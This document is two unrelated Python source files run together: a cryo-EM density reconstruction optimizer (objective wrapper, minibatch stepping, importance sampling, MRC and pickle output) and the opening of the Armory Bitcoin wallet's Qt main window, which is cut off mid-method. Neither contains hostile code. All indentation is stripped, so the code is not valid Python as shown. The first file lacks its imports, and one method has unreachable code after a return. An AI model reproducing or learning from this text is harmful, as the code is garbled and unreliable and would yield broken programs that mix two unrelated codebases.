class ObjectiveWrapper:
def __init__(self,xtype,obj = None,arg_dict = None,precond = None):
self.arg_dict = arg_dict if arg_dict is not None else {}
self.objective = obj
self.xtype = xtype
self.precond = precond
assert xtype in ['real','complex','complex_coeff','complex_herm_coeff']
def require_fspace(self):
return self.xtype in ['complex','complex_coeff','complex_herm_coeff']
def set_objective(self,obj,arg_dict = None):
self.args = arg_dict if arg_dict is not None else {}
self.objective = obj
if self.require_fspace():
assert self.objective.fspace
else:
assert not self.objective.fspace
def get_parameter(self):
return self.x0
def convert_parameter(self,x,comp_real=False,comp_fspace=False):
is_x0 = x is self.x0
if is_x0:
M, fM = self.M0, self.fM0
else:
M, fM = param2density(x, self.xtype, self.M0.shape, \
precond=self.precond)
if comp_real and M is None:
# M = density.fspace_to_real(fM)
M = fM
if comp_fspace and fM is None:
# fM = density.real_to_fspace(M)
fM = M
return M, fM
def set_density(self,M0,fM0):
self.M0 = M0
self.fM0 = fM0
self.x0 = density2params(M0,fM0,self.xtype,precond=self.precond)
return self.x0
def eval_obj(self,x,**kwargs):
M, fM = self.convert_parameter(x)
cargs = copy(self.args)
cargs.update(kwargs)
if cargs.get('compute_gradient',True):
logP,dlogP,outputs = self.objective.eval(M=M, fM=fM,
**cargs)
else:
logP,outputs = self.objective.eval(M=M, fM=fM,
**cargs)
return logP,outputs
if self.xtype in ['complex_coeff','complex_herm_coeff'] :
raise NotImplementedError()
if cargs.get('all_grads',False):
new_dlogPs = []
for adlogP in outputs['all_dlogPs']:
new_dlogP = density2params(None,adlogP.reshape(fM.shape), \
self.xtype,grad_transform=True, \
precond=self.precond)
new_dlogPs.append(new_dlogP)
outputs['all_dlogPs'] = new_dlogPs
dlogP = density2params(None,dlogP.reshape(fM.shape),self.xtype, \
grad_transform=True,precond=self.precond)
return logP,dlogP.reshape(x.shape),outputs
class CryoOptimizer(BackgroundWorker):
def outputbatchinfo(self,batch,res,logP,prefix,name):
diag = {}
stat = {}
like = {}
N_M = batch['N_M']
cepoch = self.cryodata.get_epoch(frac=True)
epoch = self.cryodata.get_epoch()
num_data = self.cryodata.N_D_Train
# sigma = np.sqrt(np.mean(res['Evar_like']))
sigma = np.sqrt(max(0, np.mean(res['Evar_like'])))
sigma_prior = np.sqrt(np.mean(res['Evar_prior']))
self.ostream(' {0} Batch:'.format(name))
if 'CV2_S' in res:
keymap = ['R', 'I', 'S']
else:
keymap = ['R', 'I']
for suff in keymap:
diag[prefix+'_CV2_'+suff] = res['CV2_'+suff]
diag[prefix+'_idxs'] = batch['img_idxs']
diag[prefix+'_sigma2_est'] = res['sigma2_est']
diag[prefix+'_correlation'] = res['correlation']
diag[prefix+'_power'] = res['power']
# self.ostream(" RMS Error: %g" % (sigma/n.sqrt(self.cryodata.noise_var)))
self.ostream(" RMS Error: %g, Signal: %g" % (sigma/np.sqrt(self.cryodata.noise_var), \
sigma_prior/np.sqrt(self.cryodata.noise_var)))
if 'CV2_S' in res:
self.ostream(" Effective # of R / I / S: %.2f / %.2f / %.2f " %\
(np.mean(res['CV2_R']), np.mean(res['CV2_I']),np.mean(res['CV2_S'])))
else:
self.ostream(" Effective # of R / I : %.2f / %.2f " % \
(np.mean(res['CV2_R']), np.mean(res['CV2_I'])))
# Importance Sampling Statistics
is_speedups = []
if 'CV2_S' in res:
keymap = ['R', 'I', 'S', 'Total']
else:
keymap = ['R','I','Total']
for suff in keymap:
if self.cparams.get('is_on_'+suff,False) or (suff == 'Total' and len(is_speedups) > 0):
spdup = N_M/res['N_' + suff + '_sampled_total']
is_speedups.append((suff,spdup,np.mean(res['N_'+suff+'_sampled']),res['N_'+suff]))
stat[prefix+'_is_speedup_'+suff] = [spdup]
else:
stat[prefix+'_is_speedup_'+suff] = [1.0]
if len(is_speedups) > 0:
lblstr = is_speedups[0][0]
numstr = '%.2f (%d of %d)' % is_speedups[0][1:]
for i in range(1,len(is_speedups)):
lblstr += ' / ' + is_speedups[i][0]
numstr += ' / %.2f (%d of %d)' % is_speedups[i][1:]
self.ostream(" IS Speedup {0}: {1}".format(lblstr,numstr))
stat[prefix+'_sigma'] = [sigma]
stat[prefix+'_logp'] = [logP]
stat[prefix+'_like'] = [res['L']]
stat[prefix+'_num_data'] = [num_data]
stat[prefix+'_num_data_evals'] = [self.num_data_evals]
stat[prefix+'_iteration'] = [self.iteration]
stat[prefix+'_epoch'] = [epoch]
stat[prefix+'_cepoch'] = [cepoch],
stat[prefix+'_time'] = [time.time()]
for k,v in res['like_timing'].items():
stat[prefix+'_like_timing_'+k] = [v]
for k,v in res['kern_timing'].items():
stat[prefix+'_kern_timing_'+k] = [v]
Idxs = batch['img_idxs']
self.img_likes[Idxs] = res['like']
like['img_likes'] = self.img_likes
like['train_idxs'] = self.cryodata.train_idxs
like['test_idxs'] = self.cryodata.test_idxs
keepidxs = self.cryodata.train_idxs if prefix == 'train' else self.cryodata.test_idxs
keeplikes = self.img_likes[keepidxs]
keeplikes = keeplikes[np.isfinite(keeplikes)]
quants = np.percentile(keeplikes, range(0,101))
stat[prefix+'_full_like_quantiles'] = [quants]
quants = np.percentile(res['like'], range(0,101))
stat[prefix+'_mini_like_quantiles'] = [quants]
stat[prefix+'_num_like_quantiles'] = [len(keeplikes)]
self.diagout.output(**diag)
self.statout.output(**stat)
self.likeout.output(**like)
def ioworker(self):
while True:
iotype,fname,data = self.io_queue.get()
try:
if iotype == 'mrc':
writeMRC(fname,*data)
np.save(fname, data[0])
elif iotype == 'pkl':
with open(fname, 'wb') as f:
pickle.dump(data, f, protocol=2)
elif iotype == 'cp':
copyfile(fname,data)
except:
print("ERROR DUMPING {0}: {1}".format(fname, sys.exc_info()[0]))
self.io_queue.task_done()
def __init__(self, expbase, cmdparams=None):
"""cryodata is a CryoData instance.
expbase is a path to the base of folder where this experiment's files
will be stored. The folder above expbase will also be searched
for .params files. These will be loaded first."""
BackgroundWorker.__init__(self)
# Create a background thread which handles IO
self.io_queue = Queue()
self.io_thread = Thread(target=self.ioworker)
self.io_thread.daemon = True
self.io_thread.start()
# General setup ----------------------------------------------------
self.expbase = os.path.join(expbase, 'logs')
self.outbase = None
# Paramter setup ---------------------------------------------------
# search above expbase for params files
_,_,filenames = next(os.walk(opj(expbase,'../')))
self.paramfiles = [opj(opj(expbase,'../'), fname) \
for fname in filenames if fname.endswith('.params')]
# search expbase for params files
_,_,filenames = next(os.walk(opj(expbase)))
self.paramfiles += [opj(expbase,fname) \
for fname in filenames if fname.endswith('.params')]
if 'local.params' in filenames:
self.paramfiles += [opj(expbase,'local.params')]
# load parameter files
self.params = Params(self.paramfiles)
self.cparams = None
if cmdparams is not None:
# Set parameter specified on the command line
for k,v in cmdparams.items():
self.params[k] = v
# Dataset setup -------------------------------------------------------
self.imgpath = self.params['inpath']
psize = self.params['resolution']
if not isinstance(self.imgpath,list):
imgstk = MRCImageStack(self.imgpath,psize)
else:
imgstk = CombinedImageStack([MRCImageStack(cimgpath,psize) for cimgpath in self.imgpath])
if self.params.get('float_images',True):
imgstk.float_images()
self.ctfpath = self.params['ctfpath']
mscope_params = self.params['microscope_params']
if not isinstance(self.ctfpath,list):
ctfstk = CTFStack(self.ctfpath,mscope_params)
else:
ctfstk = CombinedCTFStack([CTFStack(cctfpath,mscope_params) for cctfpath in self.ctfpath])
self.cryodata = CryoDataset(imgstk,ctfstk)
self.cryodata.compute_noise_statistics()
if self.params.get('window_images',True):
imgstk.window_images()
minibatch_size = self.params['minisize']
testset_size = self.params['test_imgs']
partition = self.params.get('partition',0)
num_partitions = self.params.get('num_partitions',1)
seed = self.params['random_seed']
if isinstance(partition,str):
partition = eval(partition)
if isinstance(num_partitions,str):
num_partitions = eval(num_partitions)
if isinstance(seed,str):
seed = eval(seed)
self.cryodata.divide_dataset(minibatch_size,testset_size,partition,num_partitions,seed)
# self.cryodata.set_datasign(self.params.get('datasign','auto'))
# if self.params.get('normalize_data',True):
# self.cryodata.normalize_dataset()
self.voxel_size = self.cryodata.pixel_size
# Iterations setup -------------------------------------------------
self.iteration = 0
self.tic_epoch = None
self.num_data_evals = 0
self.eval_params()
outdir = self.cparams.get('outdir',None)
if outdir is None:
if self.cparams.get('num_partitions',1) > 1:
outdir = 'partition{0}'.format(self.cparams['partition'])
else:
outdir = ''
self.outbase = opj(self.expbase,outdir)
if not os.path.isdir(self.outbase):
os.makedirs(self.outbase)
# Output setup -----------------------------------------------------
self.ostream = OutputStream(opj(self.outbase,'stdout'))
self.ostream(80*"=")
self.ostream("Experiment: " + expbase + \
" Kernel: " + self.params['kernel'])
self.ostream("Started on " + socket.gethostname() + \
" At: " + time.strftime('%B %d %Y: %I:%M:%S %p'))
try:
print('gitutil:', gitutil.git_get_SHA1().decode('utf-8'))
self.ostream("Git SHA1: " + gitutil.git_get_SHA1().decode('utf-8'))
gitutil.git_info_dump(opj(self.outbase, 'gitinfo'))
except Exception:
print("Git info is not found.")
self.ostream("Fail to dump git information")
self.ostream(80*"=")
self.startdatetime = datetime.now()
# for diagnostics and parameters
self.diagout = Output(opj(self.outbase, 'diag'),runningout=False)
# for stats (per image etc)
self.statout = Output(opj(self.outbase, 'stat'),runningout=True)
# for likelihoods of individual images
self.likeout = Output(opj(self.outbase, 'like'),runningout=False)
self.img_likes = np.empty(self.cryodata.N_D)
self.img_likes[:] = np.inf
# optimization state vars ------------------------------------------
init_model = self.cparams.get('init_model',None)
if init_model is not None:
filename = init_model
if filename.upper().endswith('.MRC'):
M = readMRC(filename)
else:
with open(filename) as fp:
M = pickle.load(fp)
if type(M)==list:
M = M[-1]['M']
if M.shape != 3*(self.cryodata.N,):
M = cryoem.resize_ndarray(M,3*(self.cryodata.N,),axes=(0,1,2))
else:
init_seed = self.cparams.get('init_random_seed', np.random.randint(10)) + self.cparams.get('partition',0)
print("Randomly generating initial density (init_random_seed = {0})...".format(init_seed)); sys.stdout.flush()
tic = time.time()
M = cryoem.generate_phantom_density(self.cryodata.N, 0.95*self.cryodata.N/2.0, \
2*self.cryodata.N/128.0, 30, seed=init_seed)
print("done in {0}s".format(time.time() - tic))
# tic = time.time()
# print("Windowing and aligning initial density..."); sys.stdout.flush()
# window the initial density
# wfunc = self.cparams.get('init_window','circle')
# cryoem.window(M,wfunc)
# Center and orient the initial density
# cryoem.align_density(M)
# print("done in {0:.2f}s".format(time.time() - tic))
M_totalmass = self.params.get('M_totalmass', None)
if M_totalmass is not None:
M *= M_totalmass / M.sum()
N = M.shape[0]
# oversampling
oversampling_factor = self.params['oversampling_factor']
V = density.real_to_fspace_with_oversampling(M, oversampling_factor)
M = V.real ** 2 + V.imag ** 2
lowpass_freq = self.cparams.get('lowpass_freq', None)
if lowpass_freq is not None:
lowpass_filter = 1.0 - geometry.gen_dense_beamstop_mask(
N, 3, lowpass_freq, psize=self.cparams['pixel_size'])
M = lowpass_filter * M + 1.0 - lowpass_filter
beamstop_freq = self.cparams.get('beamstop_freq', None)
mask_3D = geometry.gen_dense_beamstop_mask(N, 3, beamstop_freq, psize=self.cparams['pixel_size'])
# apply the symmetry operator
init_sym = get_symmetryop(self.cparams.get('init_symmetry',self.cparams.get('symmetry',None)))
if init_sym is not None:
tic = time.time()
print("Applying symmetry operator..."); sys.stdout.flush()
M = init_sym.apply(M)
print("done in {0:.2f}s".format(time.time() - tic))
# tic = time.time()
# print("Scaling initial model..."); sys.stdout.flush()
modelscale = self.cparams.get('modelscale','auto')
# mleDC, _, mleDC_est_std = self.cryodata.get_dc_estimate()
if modelscale == 'auto':
# # Err on the side of a weaker prior by using a larger value for modelscale
# modelscale = (np.abs(mleDC) + 2*mleDC_est_std)/self.cryodata.N
# print("estimated modelscale = {0:.3g}...".format(modelscale)); sys.stdout.flush()
modelscale = 1.0
self.params['modelscale'] = modelscale
self.cparams['modelscale'] = modelscale
# M *= modelscale/M.sum()
# print("done in {0:.2f}s".format(time.time() - tic))
# if mleDC_est_std/np.abs(mleDC) > 0.05:
# print(" WARNING: the DC component estimate has a high relative variance, it may be inaccurate!")
# if ((modelscale*self.cryodata.N - np.abs(mleDC)) / mleDC_est_std) > 3:
# print(" WARNING: the selected modelscale value is more than 3 std devs different than the estimated one. Be sure this is correct.")
# save initial model
tic = time.time()
print("Saving initial model..."); sys.stdout.flush()
init_model_fname = os.path.join(self.expbase, 'init_model.mrc')
writeMRC(init_model_fname, M * mask_3D, psz=self.cparams['pixel_size'])
print("done in {0:.2f}s".format(time.time() - tic))
self.M = np.require(M,dtype=density.real_t)
# self.fM = density.real_to_fspace(M)
self.fM = M
self.dM = density.zeros_like(self.M)
self.step = eval(self.cparams['optim_algo'])
self.step.setup(self.cparams, self.diagout, self.statout, self.ostream)
# Objective function setup --------------------------------------------
param_type = self.cparams.get('parameterization','real')
cplx_param = param_type in ['complex','complex_coeff','complex_herm_coeff']
self.like_func = eval_objective(self.cparams['likelihood'])
self.prior_func = eval_objective(self.cparams['prior'])
if self.cparams.get('penalty',None) is not None:
self.penalty_func = eval_objective(self.cparams['penalty'])
prior_func = SumObjectives(self.prior_func.fspace, \
[self.penalty_func,self.prior_func], None)
else:
prior_func = self.prior_func
self.obj = SumObjectives(cplx_param,
[self.like_func,prior_func], [None,None])
self.obj.setup(self.cparams, self.diagout, self.statout, self.ostream)
self.obj.set_dataset(self.cryodata)
self.obj_wrapper = ObjectiveWrapper(param_type)
self.last_save = time.time()
self.logpost_history = FiniteRunningSum()
self.like_history = FiniteRunningSum()
# Importance Samplers -------------------------------------------------
self.is_sym = get_symmetryop(self.cparams.get('is_symmetry',self.cparams.get('symmetry',None)))
self.sampler_R = FixedFisherImportanceSampler('_R',self.is_sym)
self.sampler_I = FixedFisherImportanceSampler('_I')
# self.sampler_S = FixedGaussianImportanceSampler('_S')
self.sampler_S = None
self.like_func.set_samplers(sampler_R=self.sampler_R,sampler_I=self.sampler_I,sampler_S=self.sampler_S)
def eval_params(self):
# cvars are state variables that can be used in parameter expressions
cvars = {}
cvars['cepoch'] = self.cryodata.get_epoch(frac=True)
cvars['epoch'] = self.cryodata.get_epoch()
cvars['iteration'] = self.iteration
cvars['num_data'] = self.cryodata.N_D_Train
cvars['num_batches'] = self.cryodata.N_batches
cvars['noise_std'] = np.sqrt(self.cryodata.noise_var)
cvars['data_std'] = np.sqrt(self.cryodata.data_var)
cvars['voxel_size'] = self.voxel_size
cvars['pixel_size'] = self.cryodata.pixel_size
cvars['prev_max_frequency'] = self.cparams['max_frequency'] if self.cparams is not None else None
# prelist fields are parameters that can be used in evaluating other parameter
# expressions, they can only depend on values defined in cvars
prelist = ['max_frequency']
skipfields = set(['inpath','ctfpath'])
cvars = self.params.partial_evaluate(prelist,**cvars)
if self.cparams is None:
self.max_frequency_changes = 0
else:
self.max_frequency_changes += cvars['max_frequency'] != cvars['prev_max_frequency']
cvars['num_max_frequency_changes'] = self.max_frequency_changes
cvars['max_frequency_changed'] = cvars['max_frequency'] != cvars['prev_max_frequency']
self.cparams = self.params.evaluate(skipfields,**cvars)
self.cparams['exp_path'] = self.expbase
self.cparams['out_path'] = self.outbase
if 'name' not in self.cparams:
self.cparams['name'] = '{0} - {1} - {2} ({3})'.format(self.cparams['dataset_name'], self.cparams['prior_name'], self.cparams['optimizer_name'], self.cparams['kernel'])
def run(self):
while self.dowork(): pass
print("Waiting for IO queue to clear..."); sys.stdout.flush()
self.io_queue.join()
print("done."); sys.stdout.flush()
def begin(self):
BackgroundWorker.begin(self)
def end(self):
BackgroundWorker.end(self)
def dowork(self):
"""Do one atom of work. I.E. Execute one minibatch"""
timing = {}
# Time each minibatch
tic_mini = time.time()
self.iteration += 1
# Fetch the current batches
trainbatch = self.cryodata.get_next_minibatch(self.cparams.get('shuffle_minibatches',True))
# Get the current epoch
cepoch = self.cryodata.get_epoch(frac=True)
epoch = self.cryodata.get_epoch()
num_data = self.cryodata.N_D_Train
# Evaluate the parameters
self.eval_params()
timing['setup'] = time.time() - tic_mini
# Do hyperparameter learning
if self.cparams.get('learn_params',False):
tic_learn = time.time()
if self.cparams.get('learn_prior_params',True):
tic_learn_prior = time.time()
self.prior_func.learn_params(self.params, self.cparams, M=self.M, fM=self.fM)
timing['learn_prior'] = time.time() - tic_learn_prior
if self.cparams.get('learn_likelihood_params',True):
tic_learn_like = time.time()
self.like_func.learn_params(self.params, self.cparams, M=self.M, fM=self.fM)
timing['learn_like'] = time.time() - tic_learn_like
if self.cparams.get('learn_prior_params',True) or self.cparams.get('learn_likelihood_params',True):
timing['learn_total'] = time.time() - tic_learn
# Time each epoch
if self.tic_epoch == None:
self.ostream("Epoch: %d" % epoch)
self.tic_epoch = (tic_mini,epoch)
elif self.tic_epoch[1] != epoch:
self.ostream("Epoch Total - %.6f seconds " % \
(tic_mini - self.tic_epoch[0]))
self.tic_epoch = (tic_mini,epoch)
sym = get_symmetryop(self.cparams.get('symmetry',None))
if sym is not None:
self.obj.ws[1] = 1.0/sym.get_order()
tic_mstats = time.time()
self.ostream(self.cparams['name'], " Iteration: %d" % self.iteration, \
" Epoch: %d" % epoch, " Host: %s" % socket.gethostname())
# Compute density statistics
N = self.cryodata.N
M_sum = self.M.sum(dtype=np.float64)
M_zeros = (self.M == 0).sum()
M_mean = M_sum/N**3
M_max = self.M.max()
M_min = self.M.min()
# self.ostream(" Density (min/max/avg/sum/zeros): " +
# "%.2e / %.2e / %.2e / %.2e / %g " %
# (M_min, M_max, M_mean, M_sum, M_zeros))
self.statout.output(total_density=[M_sum],
avg_density=[M_mean],
nonzero_density=[M_zeros],
max_density=[M_max],
min_density=[M_min])
timing['density_stats'] = time.time() - tic_mstats
# evaluate test batch if requested
if self.iteration <= 1 or self.cparams.get('evaluate_test_set',self.iteration%5):
tic_test = time.time()
testbatch = self.cryodata.get_testbatch()
self.obj.set_data(self.cparams,testbatch)
testLogP, res_test = self.obj.eval(M=self.M, fM=self.fM,
compute_gradient=False)
self.outputbatchinfo(testbatch, res_test, testLogP, 'test', 'Test')
timing['test_batch'] = time.time() - tic_test
else:
testLogP, res_test = None, None
# setup the wrapper for the objective function
tic_objsetup = time.time()
self.obj.set_data(self.cparams,trainbatch)
self.obj_wrapper.set_objective(self.obj)
x0 = self.obj_wrapper.set_density(self.M,self.fM)
evalobj = self.obj_wrapper.eval_obj
timing['obj_setup'] = time.time() - tic_objsetup
# Get step size
self.num_data_evals += trainbatch['N_M'] # at least one gradient
tic_objstep = time.time()
trainLogP, dlogP, v, res_train, extra_num_data = self.step.do_step(x0,
self.cparams,
self.cryodata,
evalobj,
batch=trainbatch)
# Apply the step
x = x0 + v
timing['step'] = time.time() - tic_objstep
# Convert from parameters to value
tic_stepfinalize = time.time()
prevM = np.copy(self.M)
self.M, self.fM = self.obj_wrapper.convert_parameter(x,comp_real=True)
apply_sym = sym is not None and self.cparams.get('perfect_symmetry',True) and self.cparams.get('apply_symmetry',True)
if apply_sym:
self.M = sym.apply(self.M)
# Truncate the density to bounds if they exist
if self.cparams['density_lb'] is not None:
np.maximum(self.M,self.cparams['density_lb']*self.cparams['modelscale'],out=self.M)
if self.cparams['density_ub'] is not None:
np.minimum(self.M,self.cparams['density_ub']*self.cparams['modelscale'],out=self.M)
# Compute net change
self.dM = prevM - self.M
# Convert to fourier space (may not be required)
if self.fM is None or apply_sym \
or self.cparams['density_lb'] != None \
or self.cparams['density_ub'] != None:
# self.fM = density.real_to_fspace(self.M)
self.fM = self.M
timing['step_finalize'] = time.time() - tic_stepfinalize
# Compute step statistics
tic_stepstats = time.time()
step_size = np.linalg.norm(self.dM)
grad_size = np.linalg.norm(dlogP)
M_norm = np.linalg.norm(self.M)
self.num_data_evals += extra_num_data
inc_ratio = step_size / M_norm
self.statout.output(step_size=[step_size],
inc_ratio=[inc_ratio],
grad_size=[grad_size],
norm_density=[M_norm])
timing['step_stats'] = time.time() - tic_stepstats
# Update import sampling distributions
tic_isupdate = time.time()
self.sampler_R.perform_update()
self.sampler_I.perform_update()
if self.sampler_S is not None:
self.sampler_S.perform_update()
self.diagout.output(global_phi_R=self.sampler_R.get_global_dist())
self.diagout.output(global_phi_I=self.sampler_I.get_global_dist())
if self.sampler_S is not None:
self.diagout.output(global_phi_S=self.sampler_S.get_global_dist())
timing['is_update'] = time.time() - tic_isupdate
# Output basic diagnostics
tic_diagnostics = time.time()
self.diagout.output(iteration=self.iteration, epoch=epoch, cepoch=cepoch)
if self.logpost_history.N_sum != self.cryodata.N_batches:
self.logpost_history.setup(trainLogP,self.cryodata.N_batches)
self.logpost_history.set_value(trainbatch['id'],trainLogP)
if self.like_history.N_sum != self.cryodata.N_batches:
self.like_history.setup(res_train['L'],self.cryodata.N_batches)
self.like_history.set_value(trainbatch['id'],res_train['L'])
self.outputbatchinfo(trainbatch, res_train, trainLogP, 'train', 'Train')
# Dump parameters here to catch the defaults used in evaluation
self.diagout.output(params=self.cparams,
envelope_mle=self.like_func.get_envelope_mle(),
sigma2_mle=self.like_func.get_sigma2_mle(),
hostname=socket.gethostname())
self.statout.output(num_data=[num_data],
num_data_evals=[self.num_data_evals],
iteration=[self.iteration],
epoch=[epoch],
cepoch=[cepoch],
logp=[self.logpost_history.get_mean()],
like=[self.like_history.get_mean()],
sigma=[self.like_func.get_rmse()],
time=[time.time()])
timing['diagnostics'] = time.time() - tic_diagnostics
checkpoint_it = self.iteration % self.cparams.get('checkpoint_frequency',50) == 0
save_it = checkpoint_it or self.cparams['save_iteration'] or \
time.time() - self.last_save > self.cparams.get('save_time',np.inf)
if save_it:
tic_save = time.time()
self.last_save = tic_save
if self.io_queue.qsize():
print("Warning: IO queue has become backlogged with {0} remaining, waiting for it to clear".format(self.io_queue.qsize()))
self.io_queue.join()
self.io_queue.put(( 'pkl', self.statout.fname, copy(self.statout.outdict) ))
self.io_queue.put(( 'pkl', self.diagout.fname, deepcopy(self.diagout.outdict) ))
self.io_queue.put(( 'pkl', self.likeout.fname, deepcopy(self.likeout.outdict) ))
self.io_queue.put(( 'mrc', opj(self.outbase,'model.mrc'), \
(np.require(self.M,dtype=density.real_t),self.voxel_size) ))
self.io_queue.put(( 'mrc', opj(self.outbase,'dmodel.mrc'), \
(np.require(self.dM,dtype=density.real_t),self.voxel_size) ))
if checkpoint_it:
self.io_queue.put(( 'cp', self.diagout.fname, self.diagout.fname+'-{0:06}'.format(self.iteration) ))
self.io_queue.put(( 'cp', self.likeout.fname, self.likeout.fname+'-{0:06}'.format(self.iteration) ))
self.io_queue.put(( 'cp', opj(self.outbase,'model.mrc'), opj(self.outbase,'model-{0:06}.mrc'.format(self.iteration)) ))
timing['save'] = time.time() - tic_save
time_total = time.time() - tic_mini
self.ostream(" Minibatch Total - %.2f seconds Total Runtime - %s" %
(time_total, format_timedelta(datetime.now() - self.startdatetime) ))
self.statout.output(minibatch_time=[time_total])
return self.iteration < self.cparams.get('max_iterations',np.inf) and \
cepoch < self.cparams.get('max_epochs',np.inf)
|
ArmoryQt.py
|
#!/usr/bin/python2
# -*- coding: UTF-8 -*-
##############################################################################
# #
# Copyright (C) 2011-2015, Armory Technologies, Inc. #
# Distributed under the GNU Affero General Public License (AGPL v3) #
# See LICENSE or http://www.gnu.org/licenses/agpl.html #
# #
# Copyright (C) 2016-17, goatpig #
# Distributed under the MIT license #
# See LICENSE-MIT or https://opensource.org/licenses/MIT #
# #
##############################################################################
import gettext
from copy import deepcopy
from datetime import datetime
import hashlib
import logging
import math
import os
import platform
import random
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import glob
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import psutil
import CppBlockUtils as Cpp
from armorycolors import Colors, htmlColor, QAPP
from armoryengine.ALL import *
from armoryengine.Block import PyBlock
from armoryengine.Decorators import RemoveRepeatingExtensions
from armoryengine.PyBtcWalletRecovery import WalletConsistencyCheck
from SDM import SatoshiDaemonManager
from ui.QtExecuteSignal import QtExecuteSignal
# Setup translations
translator = QTranslator(QAPP)
app_dir = "./"
try:
app_dir = os.path.dirname(os.path.realpath(__file__))
except:
if OS_WINDOWS and getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
translator.load(GUI_LANGUAGE, os.path.join(app_dir, "lang/"))
QAPP.installTranslator(translator)
from armorymodels import *
from jasvet import verifySignature
import qrc_img_resources
from qtdefines import *
from qtdialogs import *
from ui.MultiSigDialogs import DlgSelectMultiSigOption, DlgLockboxManager, \
DlgMergePromNotes, DlgCreatePromNote, DlgImportAsciiBlock
from ui.Wizards import WalletWizard, TxWizard
from ui.toolsDialogs import MessageSigningVerificationDialog
from dynamicImport import MODULE_PATH_KEY, ZIP_EXTENSION, getModuleList, importModule,\
verifyZipSignature, MODULE_ZIP_STATUS, INNER_ZIP_FILENAME,\
MODULE_ZIP_STATUS_KEY, getModuleListNoZip, dynamicImportNoZip
import tempfile
# Set URL handler to warn before opening url
handler = URLHandler()
QDesktopServices.setUrlHandler("http", handler.handleURL)
QDesktopServices.setUrlHandler("https", handler.handleURL)
# Load our framework with OS X-specific code.
if OS_MACOSX:
import ArmoryMac
# HACK ALERT: Qt has a bug in OS X where the system font settings will override
# the app's settings when a window is activated (e.g., Armory starts, the user
# switches to another app, and then switches back to Armory). There is a
# workaround, as used by TeXstudio and other programs.
# https://bugreports.qt-project.org/browse/QTBUG-5469 - Bug discussion.
# http://sourceforge.net/p/texstudio/bugs/594/?page=1 - Fix is mentioned.
# http://pyqt.sourceforge.net/Docs/PyQt4/qapplication.html#setDesktopSettingsAware
# - Mentions that this must be called before the app (QAPP) is created.
QApplication.setDesktopSettingsAware(False)
if OS_WINDOWS:
from _winreg import *
MODULES_ZIP_DIR_NAME = 'modules'
class ArmoryMainWindow(QMainWindow):
""" The primary Armory window """
#############################################################################
def __init__(self, parent=None, splashScreen=None):
super(ArmoryMainWindow, self).__init__(parent)
self.isShuttingDown = False
# Load the settings file
self.settingsPath = CLI_OPTIONS.settingsPath
self.settings = SettingsFile(self.settingsPath)
# SETUP THE WINDOWS DECORATIONS
self.lblLogoIcon = QLabel()
if USE_TESTNET:
self.setWindowTitle('Armory - Bitcoin Wallet Management [TESTNET] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
elif USE_REGTEST:
self.setWindowTitle('Armory - Bitcoin Wallet Management [REGTEST] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
else:
self.setWindowTitle('Armory - Bitcoin Wallet Management')
self.iconfile = ':/armory_icon_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_h44.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_h56.png'))
# OS X requires some Objective-C code if we're switching to the testnet
# (green) icon. We should also use a larger icon. Otherwise, Info.plist
# takes care of everything.
if not OS_MACOSX:
self.setWindowIcon(QIcon(self.iconfile))
else:
if USE_TESTNET or USE_REGTEST:
self.iconfile = ':/armory_icon_green_fullres.png'
ArmoryMac.MacDockIconHandler.instance().setMainWindow(self)
ArmoryMac.MacDockIconHandler.instance().setIcon(QIcon(self.iconfile))
self.lblLogoIcon.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.netMode = NETWORKMODE.Offline
self.abortLoad = False
self.memPoolInit = False
self.needUpdateAfterScan = True
self.sweepAfterScanList = []
self.newWalletList = []
self.newZeroConfSinceLastUpdate = []
self.lastSDMStr = ""
self.doShutdown = False
self.downloadDict = {}
self.notAvailErrorCount = 0
self.satoshiVerWarnAlready = False
self.satoshiLatestVer = None
self.latestVer = {}
self.downloadDict = {}
self.satoshiHomePath = None
self.satoshiExeSearchPath = None
self.initSyncCircBuff = []
self.latestVer = {}
self.lastVersionsTxtHash = ''
self.dlgCptWlt = None
self.wasSynchronizing = False
self.entropyAccum = []
self.allLockboxes = []
self.lockboxIDMap = {}
self.cppLockboxWltMap = {}
self.broadcasting = {}
self.nodeStatus = None
self.numHeartBeat = 0
# Error and exit on both regtest and testnet
if USE_TESTNET and USE_REGTEST:
DlgRegAndTest(self, self).exec_()
# Full list of notifications, and notify IDs that should trigger popups
# when sending or receiving.
self.changelog = []
self.downloadLinks = {}
self.almostFullNotificationList = {}
self.notifyOnSend = set()
self.notifyonRecv = set()
self.versionNotification = {}
self.notifyIgnoreLong = []
self.notifyIgnoreShort = []
self.maxPriorityID = None
self.satoshiVersions = ['',''] # [curr, avail]
self.armoryVersions = [getVersionString(BTCARMORY_VERSION), '']
self.tempModulesDirName = None
self.internetStatus = None
self.lockboxLedgModel = None
#delayed URI parsing dict
self.delayedURIData = {}
self.delayedURIData['qLen'] = 0
#Setup the signal to spawn progress dialogs from the main thread
self.connect(self, SIGNAL('initTrigger') , self.initTrigger)
self.connect(self, SIGNAL('execTrigger'), self.execTrigger)
self.connect(self, SIGNAL('checkForNegImports'), self.checkForNegImports)
'''
With Qt, all GUI operations need to happen in the main thread. If
the GUI operation is triggered from another thread, it needs to
emit a Qt signal, so that Qt can schedule the operation in the main
thread. QtExecuteSignal is a utility class that handles the signaling
and delaying/threading of execution
'''
self.signalExecution = QtExecuteSignal(self)
#push model BDM notify signal
def cppNotifySignal(action, arglist):
self.signalExecution.executeMethod(\
self.handleCppNotification, action, arglist)
TheBDM.registerCppNotification(cppNotifySignal)
# We want to determine whether the user just upgraded to a new version
self.firstLoadNewVersion = False
currVerStr = 'v'+getVersionString(BTCARMORY_VERSION)
if self.settings.hasSetting('LastVersionLoad'):
lastVerStr = self.settings.get('LastVersionLoad')
